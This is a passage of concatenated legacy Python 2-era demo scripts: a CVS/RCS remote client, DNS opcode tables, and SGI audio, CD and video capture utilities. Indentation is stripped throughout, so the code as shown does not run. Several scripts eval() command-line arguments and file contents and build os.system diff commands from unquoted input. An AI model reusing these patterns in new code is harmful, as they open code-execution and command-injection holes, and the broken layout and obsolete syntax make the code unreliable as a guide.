else: return `klass`
```
#### File: Demo/dns/dnsopcode.py
```python
QUERY = 0
IQUERY = 1
STATUS = 2
# Construct reverse mapping dictionary
_names = dir()
opcodemap = {}
for _name in _names:
if _name[0] != '_': opcodemap[eval(_name)] = _name
def opcodestr(opcode):
if opcodemap.has_key(opcode): return opcodemap[opcode]
else: return `opcode`
```
#### File: Demo/pdist/rcsclient.py
```python
import string
import os
# These defaults don't belong here -- they should be taken from the
# environment or from a hidden file in the current directory
HOST = 'voorn.cwi.nl'
PORT = 4127
VERBOSE = 1
LOCAL = 0
import client
class RCSProxyClient(client.SecureClient):
def __init__(self, address, verbose = client.VERBOSE):
client.SecureClient.__init__(self, address, verbose)
def openrcsclient(opts = []):
"open an RCSProxy client based on a list of options returned by getopt"
import RCSProxy
host = HOST
port = PORT
verbose = VERBOSE
local = LOCAL
directory = None
for o, a in opts:
if o == '-h':
host = a
if ':' in host:
i = string.find(host, ':')
host, p = host[:i], host[i+1:]
if p:
port = string.atoi(p)
if o == '-p':
port = string.atoi(a)
if o == '-d':
directory = a
if o == '-v':
verbose = verbose + 1
if o == '-q':
verbose = 0
if o == '-L':
local = 1
if local:
import RCSProxy
x = RCSProxy.RCSProxyLocal()
else:
address = (host, port)
x = RCSProxyClient(address, verbose)
if not directory:
try:
directory = open(os.path.join("CVS", "Repository")).readline()
except IOError:
pass
else:
if directory[-1] == '\n':
directory = directory[:-1]
if directory:
x.cd(directory)
return x
```
#### File: Demo/pdist/rcvs.py
```python
from cvslib import CVS, File
import md5
import os
import string
import sys
from cmdfw import CommandFrameWork
DEF_LOCAL = 1 # Default -l
class MyFile(File):
def action(self):
"""Return a code indicating the update status of this file.
The possible return values are:
'=' -- everything's fine
'0' -- file doesn't exist anywhere
'?' -- exists locally only
'A' -- new locally
'R' -- deleted locally
'U' -- changed remotely, no changes locally
(includes new remotely or deleted remotely)
'M' -- changed locally, no changes remotely
'C' -- conflict: changed locally as well as remotely
(includes cases where the file has been added
or removed locally and remotely)
'D' -- deleted remotely
'N' -- new remotely
'r' -- get rid of entry
'c' -- create entry
'u' -- update entry
(and probably others :-)
"""
if not self.lseen:
self.getlocal()
if not self.rseen:
self.getremote()
if not self.eseen:
if not self.lsum:
if not self.rsum: return '0' # Never heard of
else:
return 'N' # New remotely
else: # self.lsum
if not self.rsum: return '?' # Local only
# Local and remote, but no entry
if self.lsum == self.rsum:
return 'c' # Restore entry only
else: return 'C' # Real conflict
else: # self.eseen
if not self.lsum:
if self.edeleted:
if self.rsum: return 'R' # Removed
else: return 'r' # Get rid of entry
else: # not self.edeleted
if self.rsum:
print "warning:",
print self.file,
print "was lost"
return 'U'
else: return 'r' # Get rid of entry
else: # self.lsum
if not self.rsum:
if self.enew: return 'A' # New locally
else: return 'D' # Deleted remotely
else: # self.rsum
if self.enew:
if self.lsum == self.rsum:
return 'u'
else:
return 'C'
if self.lsum == self.esum:
if self.esum == self.rsum:
return '='
else:
return 'U'
elif self.esum == self.rsum:
return 'M'
elif self.lsum == self.rsum:
return 'u'
else:
return 'C'
def update(self):
code = self.action()
if code == '=': return
print code, self.file
if code in ('U', 'N'):
self.get()
elif code == 'C':
print "%s: conflict resolution not yet implemented" % \
self.file
elif code == 'D':
remove(self.file)
self.eseen = 0
elif code == 'r':
self.eseen = 0
elif code in ('c', 'u'):
self.eseen = 1
self.erev = self.rrev
self.enew = 0
self.edeleted = 0
self.esum = self.rsum
self.emtime, self.ectime = os.stat(self.file)[-2:]
self.extra = ''
def commit(self, message = ""):
code = self.action()
if code in ('A', 'M'):
self.put(message)
return 1
elif code == 'R':
print "%s: committing removes not yet implemented" % \
self.file
elif code == 'C':
print "%s: conflict resolution not yet implemented" % \
self.file
def diff(self, opts = []):
self.action() # To update lseen, rseen
flags = ''
rev = self.rrev
# XXX should support two rev options too!
for o, a in opts:
if o == '-r':
rev = a
else:
flags = flags + ' ' + o + a
if rev == self.rrev and self.lsum == self.rsum:
return
flags = flags[1:]
fn = self.file
data = self.proxy.get((fn, rev))
sum = md5.new(data).digest()
if self.lsum == sum:
return
import tempfile
tfn = tempfile.mktemp()
try:
tf = open(tfn, 'w')
tf.write(data)
tf.close()
print 'diff %s -r%s %s' % (flags, rev, fn)
sts = os.system('diff %s %s %s' % (flags, tfn, fn))
if sts:
print '='*70
finally:
remove(tfn)
def commitcheck(self):
return self.action() != 'C'
def put(self, message = ""):
print "Checking in", self.file, "..."
data = open(self.file).read()
if not self.enew:
self.proxy.lock(self.file)
messages = self.proxy.put(self.file, data, message)
if messages:
print messages
self.setentry(self.proxy.head(self.file), self.lsum)
def get(self):
data = self.proxy.get(self.file)
f = open(self.file, 'w')
f.write(data)
f.close()
self.setentry(self.rrev, self.rsum)
def log(self, otherflags):
print self.proxy.log(self.file, otherflags)
def add(self):
self.eseen = 0 # While we're hacking...
self.esum = self.lsum
self.emtime, self.ectime = 0, 0
self.erev = ''
self.enew = 1
self.edeleted = 0
self.eseen = 1 # Done
self.extra = ''
def setentry(self, erev, esum):
self.eseen = 0 # While we're hacking...
self.esum = esum
self.emtime, self.ectime = os.stat(self.file)[-2:]
self.erev = erev
self.enew = 0
self.edeleted = 0
self.eseen = 1 # Done
self.extra = ''
SENDMAIL = "/usr/lib/sendmail -t"
MAILFORM = """To: %s
Subject: CVS changes: %s
...Message from rcvs...
Committed files:
%s
Log message:
%s
"""
class RCVS(CVS):
FileClass = MyFile
def __init__(self):
CVS.__init__(self)
def update(self, files):
for e in self.whichentries(files, 1):
e.update()
def commit(self, files, message = ""):
list = self.whichentries(files)
if not list: return
ok = 1
for e in list:
if not e.commitcheck():
ok = 0
if not ok:
print "correct above errors first"
return
if not message:
message = raw_input("One-liner: ")
committed = []
for e in list:
if e.commit(message):
committed.append(e.file)
self.mailinfo(committed, message)
def mailinfo(self, files, message = ""):
towhom = "<EMAIL>, <EMAIL>" # XXX
mailtext = MAILFORM % (towhom, string.join(files),
string.join(files), message)
print '-'*70
print mailtext
print '-'*70
ok = raw_input("OK to mail to %s? " % towhom)
if string.lower(string.strip(ok)) in ('y', 'ye', 'yes'):
p = os.popen(SENDMAIL, "w")
p.write(mailtext)
sts = p.close()
if sts:
print "Sendmail exit status %s" % str(sts)
else:
print "Mail sent."
else:
print "No mail sent."
def report(self, files):
for e in self.whichentries(files):
e.report()
def diff(self, files, opts):
for e in self.whichentries(files):
e.diff(opts)
def add(self, files):
if not files:
raise RuntimeError, "'cvs add' needs at least one file"
list = []
for e in self.whichentries(files, 1):
e.add()
def rm(self, files):
if not files:
raise RuntimeError, "'cvs rm' needs at least one file"
raise RuntimeError, "'cvs rm' not yet imlemented"
def log(self, files, opts):
flags = ''
for o, a in opts:
flags = flags + ' ' + o + a
for e in self.whichentries(files):
e.log(flags)
def whichentries(self, files, localfilestoo = 0):
if files:
list = []
for file in files:
if self.entries.has_key(file):
e = self.entries[file]
else:
e = self.FileClass(file)
self.entries[file] = e
list.append(e)
else:
list = self.entries.values()
for file in self.proxy.listfiles():
if self.entries.has_key(file):
continue
e = self.FileClass(file)
self.entries[file] = e
list.append(e)
if localfilestoo:
for file in os.listdir(os.curdir):
if not self.entries.has_key(file) \
and not self.ignored(file):
e = self.FileClass(file)
self.entries[file] = e
list.append(e)
list.sort()
if self.proxy:
for e in list:
if e.proxy is None:
e.proxy = self.proxy
return list
class rcvs(CommandFrameWork):
GlobalFlags = 'd:h:p:qvL'
UsageMessage = \
"usage: rcvs [-d directory] [-h host] [-p port] [-q] [-v] [subcommand arg ...]"
PostUsageMessage = \
"If no subcommand is given, the status of all files is listed"
def __init__(self):
"""Constructor."""
CommandFrameWork.__init__(self)
self.proxy = None
self.cvs = RCVS()
def close(self):
if self.proxy:
self.proxy._close()
self.proxy = None
def recurse(self):
self.close()
names = os.listdir(os.curdir)
for name in names:
if name == os.curdir or name == os.pardir:
continue
if name == "CVS":
continue
if not os.path.isdir(name):
continue
if os.path.islink(name):
continue
print "--- entering subdirectory", name, "---"
os.chdir(name)
try:
if os.path.isdir("CVS"):
self.__class__().run()
else:
self.recurse()
finally:
os.chdir(os.pardir)
print "--- left subdirectory", name, "---"
def options(self, opts):
self.opts = opts
def ready(self):
import rcsclient
self.proxy = rcsclient.openrcsclient(self.opts)
self.cvs.setproxy(self.proxy)
self.cvs.getentries()
def default(self):
self.cvs.report([])
def do_report(self, opts, files):
self.cvs.report(files)
def do_update(self, opts, files):
"""update [-l] [-R] [file] ..."""
local = DEF_LOCAL
for o, a in opts:
if o == '-l': local = 1
if o == '-R': local = 0
self.cvs.update(files)
self.cvs.putentries()
if not local and not files:
self.recurse()
flags_update = '-lR'
do_up = do_update
flags_up = flags_update
def do_commit(self, opts, files):
"""commit [-m message] [file] ..."""
message = ""
for o, a in opts:
if o == '-m': message = a
self.cvs.commit(files, message)
self.cvs.putentries()
flags_commit = 'm:'
do_com = do_commit
flags_com = flags_commit
def do_diff(self, opts, files):
"""diff [difflags] [file] ..."""
self.cvs.diff(files, opts)
flags_diff = 'cbitwcefhnlr:sD:S:'
do_dif = do_diff
flags_dif = flags_diff
def do_add(self, opts, files):
"""add file ..."""
if not files:
print "'rcvs add' requires at least one file"
return
self.cvs.add(files)
self.cvs.putentries()
def do_remove(self, opts, files):
"""remove file ..."""
if not files:
print "'rcvs remove' requires at least one file"
return
self.cvs.remove(files)
self.cvs.putentries()
do_rm = do_remove
def do_log(self, opts, files):
"""log [rlog-options] [file] ..."""
self.cvs.log(files, opts)
flags_log = 'bhLNRtd:s:V:r:'
def remove(fn):
try:
os.unlink(fn)
except os.error:
pass
def main():
r = rcvs()
try:
r.run()
finally:
r.close()
if __name__ == "__main__":
main()
```
#### File: Demo/scripts/mkrcs.py
```python
import os
def main():
rcstree = 'RCStree'
rcs = 'RCS'
if os.path.islink(rcs):
print `rcs`, 'is a symlink to', `os.readlink(rcs)`
return
if os.path.isdir(rcs):
print `rcs`, 'is an ordinary directory'
return
if os.path.exists(rcs):
print `rcs`, 'is a file?!?!'
return
#
p = os.getcwd()
up = ''
down = ''
# Invariants:
# (1) join(p, down) is the current directory
# (2) up is the same directory as p
# Ergo:
# (3) join(up, down) is the current directory
#print 'p =', `p`
while not os.path.isdir(os.path.join(p, rcstree)):
head, tail = os.path.split(p)
#print 'head =', `head`, '; tail =', `tail`
if not tail:
print 'Sorry, no ancestor dir contains', `rcstree`
return
p = head
up = os.path.join(os.pardir, up)
down = os.path.join(tail, down)
#print 'p =', `p`, '; up =', `up`, '; down =', `down`
there = os.path.join(up, rcstree)
there = os.path.join(there, down)
there = os.path.join(there, rcs)
if os.path.isdir(there):
print `there`, 'already exists'
else:
print 'making', `there`
makedirs(there)
print 'making symlink', `rcs`, '->', `there`
os.symlink(there, rcs)
def makedirs(p):
if not os.path.isdir(p):
head, tail = os.path.split(p)
makedirs(head)
os.mkdir(p, 0777)
main()
```
#### File: Demo/scripts/script.py
```python
import os, time, sys
import pty
def read(fd):
data = os.read(fd, 1024)
file.write(data)
return data
shell = 'sh'
filename = 'typescript'
mode = 'w'
if os.environ.has_key('SHELL'):
shell = os.environ['SHELL']
if '-a' in sys.argv:
mode = 'a'
if '-p' in sys.argv:
shell = 'python'
file = open(filename, mode)
sys.stdout.write('Script started, file is %s\n' % filename)
file.write('Script started on %s\n' % time.ctime(time.time()))
pty.spawn(shell, read)
file.write('Script done on %s\n' % time.ctime(time.time()))
sys.stdout.write('Script done, file is %s\n' % filename)
```
#### File: sgi/al/playold.py
```python
import al, sys, time
import AL
BUFSIZE = 8000
def main():
if len(sys.argv) < 2:
f = sys.stdin
filename = sys.argv[0]
else:
if len(sys.argv) <> 2:
sys.stderr.write('usage: ' + \
sys.argv[0] + ' filename\n')
sys.exit(2)
filename = sys.argv[1]
f = open(filename, 'r')
#
magic = f.read(4)
extra = ''
if magic == '0008':
rate = 8000
elif magic == '0016':
rate = 16000
elif magic == '0032':
rate = 32000
else:
sys.stderr.write('no magic header; assuming 8k samples/sec.\n')
rate = 8000
extra = magic
#
pv = [AL.OUTPUT_RATE, rate]
al.setparams(AL.DEFAULT_DEVICE, pv)
c = al.newconfig()
c.setchannels(AL.MONO)
c.setwidth(AL.SAMPLE_8)
port = al.openport(filename, 'w', c)
if extra:
port.writesamps(extra)
while 1:
buf = f.read(BUFSIZE)
if not buf: break
port.writesamps(buf)
while port.getfilled() > 0:
time.sleep(0.1)
try:
main()
except KeyboardInterrupt:
sys.exit(1)
```
#### File: sgi/al/record.py
```python
import al, sys
import AL
BUFSIZE = 2000
QSIZE = 4000
def main():
c = al.newconfig()
c.setchannels(AL.MONO)
c.setqueuesize(QSIZE)
p = al.openport('', 'r', c)
while 1:
data = p.readsamps(BUFSIZE)
sys.stdout.write(data)
try:
main()
except KeyboardInterrupt:
sys.exit(1)
```
#### File: sgi/cd/cdaiff.py
```python
import sys
import readcd
import aifc
import AL
import cd
Error = 'cdaiff.Error'
def writeaudio(a, type, data):
a.writeframesraw(data)
def main():
if len(sys.argv) > 1:
a = aifc.open(sys.argv[1], 'w')
else:
a = aifc.open('@', 'w')
a.setsampwidth(AL.SAMPLE_16)
a.setnchannels(AL.STEREO)
a.setframerate(AL.RATE_44100)
r = readcd.Readcd()
for arg in sys.argv[2:]:
x = eval(arg)
try:
if len(x) <> 2:
raise Error, 'bad argument'
r.appendstretch(x[0], x[1])
except TypeError:
r.appendtrack(x)
r.setcallback(cd.audio, writeaudio, a)
r.play()
a.close()
main()
```
#### File: sgi/cd/listcd.py
```python
import cd
def main():
c = cd.open()
info = []
while 1:
try:
info.append(c.gettrackinfo(len(info) + 1))
except RuntimeError:
break
for i in range(len(info)):
start, total = info[i]
print 'Track', zfill(i+1), triple(start), triple(total)
def triple((a, b, c)):
return zfill(a) + ':' + zfill(b) + ':' + zfill(c)
def zfill(n):
s = `n`
return '0' * (2 - len(s)) + s
main()
```
#### File: sgi/gl/glinfo.py
```python
import gl
import GL
def main():
names = []
maxlen = 0
for name in dir(GL):
if name[:3] == 'GD_':
names.append(name)
maxlen = max(maxlen, len(name))
for name in names:
print name + (maxlen - len(name))*' ' + '=',
print gl.getgdesc(getattr(GL, name))
main()
```
#### File: gl/glstdwin/tcolor.py
```python
import stdwingl
import stdwin
from stdwinevents import *
NROWS = 16
NCOLS = 16
def main():
stdwin.setdefwinsize(NCOLS * stdwin.textwidth('12345'), \
NROWS * stdwin.lineheight() * 3)
w = stdwin.open('TestColors')
#
while 1:
type, window, detail = stdwin.getevent()
if type == WE_CLOSE:
print 'Bye.'
break
elif type == WE_SIZE:
w.change((0,0), (10000, 10000))
elif type == WE_DRAW:
width, height = w.getwinsize()
d = w.begindrawing()
for row in range(NROWS):
for col in range(NCOLS):
color = row*NCOLS + col
d.setfgcolor(color)
p = col*width/NCOLS, row*height/NROWS
q = (col+1)*width/NCOLS, \
(row+1)*height/NROWS
d.paint((p, q))
d.setfgcolor(0)
d.box((p, q))
d.text(p, `color`)
p = p[0] , p[1]+ d.lineheight()
d.setfgcolor(7)
d.text(p, `color`)
del d
#
main()
```
#### File: sgi/sv/burstcapt.py
```python
import sys
import sv, SV
import gl, GL, DEVICE
def main():
format = SV.RGB8_FRAMES
requestedwidth = SV.PAL_XMAX
queuesize = 30
if sys.argv[1:]:
queuesize = eval(sys.argv[1])
v = sv.OpenVideo()
svci = (format, requestedwidth, 0, queuesize, 0)
go = raw_input('Press return to capture ' + `queuesize` + ' frames: ')
result = v.CaptureBurst(svci)
svci, buffer, bitvec = result
## svci, buffer = result # XXX If bit vector not yet implemented
print 'Captured', svci[3], 'frames, i.e.', len(buffer)/1024, 'K bytes'
w, h = svci[1:3]
framesize = w * h
gl.prefposition(300, 300+w-1, 100, 100+h-1)
gl.foreground()
win = gl.winopen('Burst Capture')
gl.RGBmode()
gl.gconfig()
gl.qdevice(DEVICE.LEFTMOUSE)
gl.qdevice(DEVICE.ESCKEY)
print 'Click left mouse for next frame'
for i in range(svci[3]):
inverted_frame = sv.RGB8toRGB32(1, \
buffer[i*framesize:(i+1)*framesize], w, h)
gl.lrectwrite(0, 0, w-1, h-1, inverted_frame)
while 1:
dev, val = gl.qread()
if dev == DEVICE.LEFTMOUSE and val == 1:
break
if dev == DEVICE.REDRAW:
gl.lrectwrite(0, 0, w-1, h-1, inverted_frame)
if dev == DEVICE.ESCKEY:
v.CloseVideo()
gl.winclose(win)
return
v.CloseVideo()
gl.winclose(win)
main()
```
#### File: sgi/sv/rgbgrab.py
```python
import sys
import sv, SV
import gl, GL, DEVICE
import time
def main():
v = sv.OpenVideo()
# Determine maximum window size based on signal standard
param = [SV.BROADCAST, 0]
v.GetParam(param)
if param[1] == SV.PAL:
width = SV.PAL_XMAX
height = SV.PAL_YMAX
elif param[1] == SV.NTSC:
width = SV.NTSC_XMAX
height = SV.NTSC_YMAX
else:
print 'Unknown video standard', param[1]
sys.exit(1)
# Initially all windows are half size
grabwidth, grabheight = width/2, height/2
# Open still window
gl.foreground()
gl.prefsize(grabwidth, grabheight)
still_win = gl.winopen('Grabbed frame')
gl.keepaspect(width, height)
gl.maxsize(width, height)
gl.winconstraints()
gl.RGBmode()
gl.gconfig()
gl.clear()
gl.pixmode(GL.PM_SIZE, 8)
# Open live window
gl.foreground()
gl.prefsize(grabwidth, grabheight)
live_win = gl.winopen('Live video')
gl.keepaspect(width, height)
gl.maxsize(width, height)
gl.winconstraints()
# Bind live video
v.SetSize(gl.getsize())
v.BindGLWindow(live_win, SV.IN_REPLACE)
print 'Use leftmouse to grab frame'
gl.qdevice(DEVICE.LEFTMOUSE)
gl.qdevice(DEVICE.WINQUIT)
gl.qdevice(DEVICE.WINSHUT)
gl.qdevice(DEVICE.ESCKEY)
frame = None
while 1:
dev, val = gl.qread()
if dev == DEVICE.LEFTMOUSE and val == 0:
w, h, fields = v.CaptureOneFrame(SV.RGB8_FRAMES, \
grabwidth, grabheight)
frame = sv.InterleaveFields(1, fields, w, h)
gl.winset(still_win)
gl.lrectwrite(0, 0, w - 1, h - 1, frame)
gl.winset(live_win)
if dev in (DEVICE.ESCKEY, DEVICE.WINQUIT, DEVICE.WINSHUT):
v.CloseVideo()
gl.winclose(live_win)
gl.winclose(still_win)
break
if dev == DEVICE.REDRAW and val == still_win:
gl.winset(still_win)
gl.reshapeviewport()
gl.clear()
grabwidth, grabheight = gl.getsize()
if frame:
gl.lrectwrite(0, 0, w - 1, h - 1, frame)
gl.winset(live_win)
if dev == DEVICE.REDRAW and val == live_win:
v.SetSize(gl.getsize())
v.BindGLWindow(live_win, SV.IN_REPLACE)
main()
```
#### File: sgi/video/DisplayVideoIn.py
```python
import gl
import GL
# The live video input class.
# Only instantiate this if have_video is true!
class DisplayVideoIn:
# Initialize an instance. Arguments:
# vw, vh: size of the video window data to be captured.
# position defaults to 0, 0 but can be set later
def __init__(self, pktmax, vw, vh, type):
self.pktmax = pktmax
self.realwidth, self.realheight = vw, vh
if type <> 'rgb':
raise 'Incorrent video data type', type
self.type = type
self.width = vw
self.height = vh
#
# Open dummy window
#
gl.foreground()
gl.noport()
self.wid = gl.winopen('DisplayVideoIn')
self.x0 = 0
self.x1 = self.x0 + self.width - 1
self.y0 = 0
self.y1 = self.y0 + self.height - 1
# Compute # full lines per packet
self.lpp = pktmax / self.linewidth()
if self.lpp <= 0:
raise 'No lines in packet', self.linewidth()
self.pktsize = self.lpp*self.linewidth()
self.data = None
self.old_data = None
self.dataoffset = 0
self.lpos = 0
self.hints = 0
# Change the size of the video being displayed.
def resizevideo(self, vw, vh):
self.width = vw
self.height = vh
self.x1 = self.x0 + self.width - 1
self.y1 = self.y0 + self.height - 1
def positionvideo(self, x, y):
self.x0 = x
self.y0 = y
self.x1 = self.x0 + self.width - 1
self.y1 = self.y0 + self.height - 1
# Remove an instance.
# This turns off continuous capture.
def close(self):
gl.winclose(self.wid)
# Get the length in bytes of a video line
def linewidth(self):
return self.width*4
# Get the next video packet.
# This returns (lpos, data) where:
# - lpos is the line position
# - data is a piece of data
# The dimensions of data are:
# - pixel depth = 1 byte
# - scan line width = self.width (the vw argument to __init__())
# - number of scan lines = self.lpp (PKTMAX / vw)
def getnextpacket(self):
if not self.data or self.dataoffset >= len(self.data):
self.old_data = self.data
self.data = gl.readdisplay(self.x0, self.y0, \
self.x1, self.y1, self.hints)
self.dataoffset = 0
self.lpos = 0
data = self.data[self.dataoffset:self.dataoffset+self.pktsize]
while self.old_data and \
self.dataoffset+self.pktsize < len(self.data):
odata = self.old_data[self.dataoffset: \
self.dataoffset+self.pktsize]
if odata <> data:
break
print 'skip', self.lpos
self.lpos = self.lpos + self.lpp
self.dataoffset = self.dataoffset + self.pktsize
data = self.data[self.dataoffset:\
self.dataoffset+self.pktsize]
lpos = self.lpos
self.dataoffset = self.dataoffset + self.pktsize
self.lpos = self.lpos + self.lpp
return lpos, data
```
#### File: sgi/video/makemovie.py
```python
import sys
sys.path.append('/ufs/guido/src/video')
import sv, SV
import VFile
import gl, GL, DEVICE
import al, AL
import time
import posix
import getopt
import string
def main():
QSIZE = 16
TIME = 5
audio = 0
opts, args = getopt.getopt(sys.argv[1:], 'aq:t:')
for opt, arg in opts:
if opt == '-a':
audio = 1
elif opt == '-q':
QSIZE = string.atoi(arg)
elif opt == '-t':
TIME = string.atoi(arg)
if args:
filename = args[0]
else:
filename = 'film.video'
if audio:
if args[1:]:
audiofilename = args[1]
else:
audiofilename = 'film.aiff'
gl.foreground()
x, y = SV.PAL_XMAX / 4, SV.PAL_YMAX / 4
print x, 'x', y
gl.minsize(40, 30)
gl.stepunit(8, 6)
gl.maxsize(SV.PAL_XMAX, SV.PAL_YMAX)
gl.keepaspect(SV.PAL_XMAX, SV.PAL_YMAX)
win = gl.winopen(filename)
x, y = gl.getsize()
print x, 'x', y
v = sv.OpenVideo()
v.BindGLWindow(win, SV.IN_REPLACE)
v.SetSize(x, y)
v.BindGLWindow(win, SV.IN_REPLACE)
v.SetCaptureFormat(SV.RGB_FRAMES)
v.SetCaptureMode(SV.BLOCKING_CAPTURE)
v.SetQueueSize(QSIZE)
v.InitCapture()
if v.GetQueueSize() != QSIZE:
QSIZE = v.GetQueueSize()
print 'Warning: QSIZE reduced to', QSIZE
gl.qdevice(DEVICE.LEFTMOUSE)
gl.qdevice(DEVICE.WINQUIT)
gl.qdevice(DEVICE.WINSHUT)
gl.qdevice(DEVICE.ESCKEY)
print 'Click left mouse to start recording', TIME, 'seconds'
ofile = None
afile = None
# Mouse down opens the file & freezes window
# Mouse up starts recording frames
while 1:
dev, val = gl.qread()
if dev == DEVICE.LEFTMOUSE:
# Start recording
if val == 1:
# Mouse down -- preparations
if ofile == None:
ofile = VFile.VoutFile().init(filename)
ofile.format = 'rgb8'
ofile.width = x
ofile.height = y
ofile.writeheader()
# XXX other format bits?
# The window can't be resized from now
gl.prefsize(x, y)
gl.winconstraints()
gl.wintitle('* ' + filename)
if audio:
afile = initaudio(audiofilename)
continue
# Mouse up -- start actual recording
global recording, stop_recording
if audio:
stop_recording = 0
recording.release()
t0 = time.millitimer()
v.StartCapture()
while 1:
t = time.millitimer() - t0
if t >= TIME*1000:
break
if v.GetCaptured() > 2:
doframe(v, ofile, x, y, t)
v.StopCapture()
stop_recording = 1
while v.GetCaptured() > 0:
doframe(v, ofile, x, y, t)
t = time.millitimer() - t0
gl.wintitle(filename)
elif dev == DEVICE.REDRAW:
# Window resize (or move)
x, y = gl.getsize()
print x, 'x', y
v.SetSize(x, y)
v.BindGLWindow(win, SV.IN_REPLACE)
elif dev in (DEVICE.ESCKEY, DEVICE.WINQUIT, DEVICE.WINSHUT):
# Quit
if ofile:
ofile.close()
if afile:
afile.destroy()
posix._exit(0)
# EndCapture dumps core...
v.EndCapture()
v.CloseVideo()
gl.winclose(win)
def doframe(v, ofile, x, y, t):
cd, start = v.GetCaptureData()
data = cd.interleave(x, y)
cd.UnlockCaptureData()
ofile.writeframe(t, data, None)
AQSIZE = 16000
def initaudio(filename):
import thread, aiff
global recording, stop_recording
afile = aiff.Aiff().init(filename, 'w')
afile.nchannels = AL.MONO
afile.sampwidth = AL.SAMPLE_8
params = [AL.INPUT_RATE, 0]
al.getparams(AL.DEFAULT_DEVICE, params)
print 'rate =', params[1]
afile.samprate = params[1]
c = al.newconfig()
c.setchannels(AL.MONO)
c.setqueuesize(AQSIZE)
c.setwidth(AL.SAMPLE_8)
aport = al.openport(filename, 'r', c)
recording = thread.allocate_lock()
recording.acquire()
stop_recording = 0
thread.start_new_thread(recorder, (afile, aport))
return afile
def recorder(afile, aport):
# XXX recording more than one fragment doesn't work
# XXX (the thread never dies)
recording.acquire()
while not stop_recording:
data = aport.readsamps(AQSIZE/2)
afile.writesampsraw(data)
del data
main()
```
#### File: sgi/video/VcrIndex.py
```python
import os
import string
error='VcrIndex.error'
VERSION_STRING='#!VcrIndex 1.1\n'
PREV_VERSION_STRING='#!VcrIndex 1.0\n'
class VcrIndex:
def __init__(self, name):
self.curmovie = None
self.curscene = None
self.modified = 0
self.filename = name
self.basename = os.path.basename(name)
self.editable = []
if not name:
self.movies = {}
return
try:
fp = open(name, 'r')
except IOError:
self.movies = {}
return
header = fp.readline()
if header == PREV_VERSION_STRING:
print 'Converting old-format database...'
data = fp.read(100000)
self.movies = eval(data)
for m in self.movies.keys():
d = self.movies[m]
newd = {}
for s in d.keys():
newsd = {}
newsd['START'] = d[s]
if s == 'START':
s = '-ALL-'
newd[s] = newsd
self.movies[m] = newd
print 'Done.'
return
if header <> VERSION_STRING:
print 'VcrIndex: incorrect version string:', header
self.movies = {}
return
data = fp.read(100000)
self.movies = eval(data)
#
# Save database to given file (or same file as read from if no
# filename given).
#
def save(self, name):
if not name:
name = self.filename
if not name:
raise error, 'No filename given'
self.filename = name
bupname = name + '~'
try:
os.unlink(bupname)
except os.error:
pass
try:
os.rename(name, bupname)
except os.error:
pass
fp = open(name, 'w')
data = str(self.movies)
fp.write(VERSION_STRING)
fp.write(data)
fp.write('\n')
fp.close()
self.modified = 0
#
# Get a list of movie names in tape order
#
def get_movienames(self):
names = self.movies.keys()
sorted = []
for name in names:
sorted.append(self.movies[name]['-ALL-']['START'], name)
sorted.sort()
rv = []
for pos, name in sorted:
rv.append(name)
return rv
#
# Get a list of scene names in tape order
#
def get_scenenames(self):
if not self.curmovie:
return []
scenedict = self.movies[self.curmovie]
names = scenedict.keys()
sorted = []
for name in names:
sorted.append(scenedict[name], name)
sorted.sort()
rv = []
for pos, name in sorted:
rv.append(name)
return rv
#
# Get a list of scene ids (format '00:02:32:12 name') in tape order
#
def get_sceneids(self):
if not self.curmovie:
return []
scenedict = self.movies[self.curmovie]
names = scenedict.keys()
sorted = []
for name in names:
sorted.append(scenedict[name]['START'], name)
sorted.sort()
rv = []
for pos, name in sorted:
str = '%02d:%02d:%02d:%02d ' % pos
rv.append(str + name)
return rv
#
# Does a movie exist?
#
def movie_exists(self, name):
return self.movies.has_key(name)
#
# Select a movie.
#
def movie_select(self, name):
if not self.movies.has_key(name):
raise error, 'No such movie: '+name
self.curmovie = name
self.curscene = None
#
# Get movie dictionary, or raise an error if no current movie.
#
def _getmoviedict(self):
if not self.curmovie:
raise error, 'No current movie'
return self.movies[self.curmovie]
#
# Rename a movie.
#
def movie_rename(self, newname):
scenedict = self._getmoviedict()
if self.movie_exists(newname):
raise error, 'Movie already exists: '+newname
del self.movies[self.curmovie]
self.movies[newname] = scenedict
self.curmovie = newname
self.modified = 1
#
# Copy a movie.
#
def movie_copy(self, newname):
scenedict = self._getmoviedict()
if self.movie_exists(newname):
raise error, 'Movie already exists: '+newname
newdict = {}
for k in scenedict.keys():
olddata = scenedict[k]
newdata = {}
for i in olddata.keys():
newdata[i] = olddata[i]
newdict[k] = newdata
self.movies[newname] = newdict
self.curmovie = newname
self.modified = 1
#
# Delete a movie.
#
def movie_delete(self):
if not self.curmovie:
raise error, 'No current movie'
del self.movies[self.curmovie]
self.curmovie = None
self.curscene = None
self.modified = 1
#
# Create a new movie.
#
def movie_new(self, name, pos):
if self.movie_exists(name):
raise error, 'Movie already exists: '+name
newdict = {}
newsdict = {}
newsdict['START'] = pos
newdict['-ALL-'] = newsdict
self.movies[name] = newdict
self.curmovie = name
self.curscene = None
self.modified = 1
#
# Does a scene exist?
#
def scene_exists(self, name):
scenedict = self._getmoviedict()
return scenedict.has_key(name)
#
# Select a current scene.
#
def scene_select(self, name):
scenedict = self._getmoviedict()
if not scenedict.has_key(name):
raise error, 'No such scene: '+name
self.curscene = name
#
# Rename a scene.
#
def scene_rename(self, newname):
scenedict = self._getmoviedict()
if not self.curscene:
raise error, 'No current scene'
if scenedict.has_key(newname):
raise error, 'Scene already exists: '+newname
if self.curscene == '-ALL-':
raise error, 'Cannot rename -ALL-'
scenedict[newname] = scenedict[self.curscene]
del scenedict[self.curscene]
self.curscene = newname
self.modified = 1
#
# Copy a scene.
#
def scene_copy(self, newname):
scenedict = self._getmoviedict()
if not self.curscene:
raise error, 'No current scene'
if scenedict.has_key(newname):
raise error, 'Scene already exists: '+newname
scenedict[newname] = scenedict[self.curscene]
self.curscene = newname
self.modified = 1
#
# Delete a scene.
#
def scene_delete(self):
scenedict = self._getmoviedict()
if not self.curscene:
raise error, 'No current scene'
if self.curscene == '-ALL-':
raise error, 'Cannot delete -ALL-'
del scenedict[self.curscene]
self.curscene = None
self.modified = 1
#
# Add a new scene.
#
def scene_new(self, newname, pos):
scenedict = self._getmoviedict()
if scenedict.has_key(newname):
raise error, 'Scene already exists: '+newname
newdict = {}
newdict['START'] = pos
scenedict[newname] = newdict
self.curscene = newname
self.modified = 1
#
# Get scene data.
#
def _getscenedata(self):
scenedict = self._getmoviedict()
if not self.curscene:
raise error, 'No current scene'
return scenedict[self.curscene]
#
# Data manipulation routines.
#
def pos_get(self):
return self._getscenedata()['START']
#
def pos_set(self, pos):
